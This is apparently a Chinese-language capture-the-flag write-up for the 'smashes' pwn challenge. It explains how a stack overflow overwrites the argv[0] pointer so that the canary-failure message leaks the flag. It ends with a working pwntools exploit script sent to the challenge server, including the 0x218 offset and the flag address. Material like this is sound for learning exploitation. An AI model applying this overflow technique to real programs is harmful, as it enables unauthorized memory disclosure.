pwn smashes

题目分析

1. 检查保护机制
   
   开启NX，canary，fortify 保护，可以得出不能往堆栈中写入shellcode进行控制利用。

2. ida中打开
   

3. 输入不正确的canary后，会触发栈保护错误，利用打印出argv[0]的地址覆盖成想要输出内容的地址。触发栈保护错误后，./smashes就是argv[0]的内容。
   
   
   参考

4. 想要输出的flag的地址，在程序中存在，所以能找到。
   

5. angv[0]_addr:即程序名的地址。在main函数出下个断点，即可查看。
   

6. 查看程序输入name的地址，即程序输入位置
   

7. 在0x400813处下断点，单步运行直到输入name，输入后，即可查看输入地址。如下图标注处。
   

8. 计算得出程序输入位置与想要覆盖的angv[0]的地址之间的距离：
   0x7fffffffde28-0x7fffffffdc10=0x218，在加上想要输出的flag的地址即可实现利用。

利用脚本

from pwn import *
r = remote("pwn.jarvisoj.com",9877)
flag_addr= 0x400d21
payload = 'a'*0x218+p64(flag_addr)
r.sendline(payload)
r.interactive()